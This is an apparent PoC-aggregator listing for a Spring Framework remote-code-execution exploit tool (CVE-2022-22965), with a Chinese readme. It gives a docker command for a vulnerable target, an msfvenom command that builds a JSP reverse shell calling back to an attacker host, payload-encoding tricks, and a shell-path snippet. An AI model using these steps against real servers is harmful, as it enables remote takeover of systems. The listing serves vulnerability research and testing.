CVE-2022-22965 PoC — Spring Framework 代码注入漏洞

Source

https://github.com/iloveflag/Fast-CVE-2022-22965

Associated Vulnerability

Title:Spring Framework 代码注入漏洞 (CVE-2022-22965)
Description:A Spring MVC or Spring WebFlux application running on JDK 9+ may be vulnerable to remote code execution (RCE) via data binding. The specific exploit requires the application to run on Tomcat as a WAR deployment. If the application is deployed as a Spring Boot executable jar, i.e. the default, it is not vulnerable to the exploit. However, the nature of the vulnerability is more general, and there may be other ways to exploit it.

Description

CVE-2022-22965图形化检测工具

Readme

靶机
```bash
docker run -itd -p 80:8080 vulfocus/spring-core-rce-2022-03-29:latest
```
反弹shell实质为参照msfvenom
```bash
msfvenom -p java/jsp_shell_reverse_tcp LHOST=xxx LPORT=xxx -f raw -o shell.jsp
```
将jsp url编码后，用
```html
%3C%25替换 %25%7Bc2%7Di 代表<%
%25%3E 替换 %25%7Bsuffix%7Di 代表 %>
```
代码中针对不同类型服务器进行了shellpath的修改判断
```python
if self.radioButton_win.isChecked():
    shellpath = "cmd.exe"
if self.radioButton_linux.isChecked():
    shellpath = "/bin/sh"
```
命令执行：
![](img/cmd.png)
whoami探测:
![](img/whoami.png)
一键反弹shell
![](img/reverse.png)

File Snapshot

Remarks

1. It is advised to access via the original source first.

2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.

View subscription plans →

Goal Reached Thanks to every supporter — we hit 100%!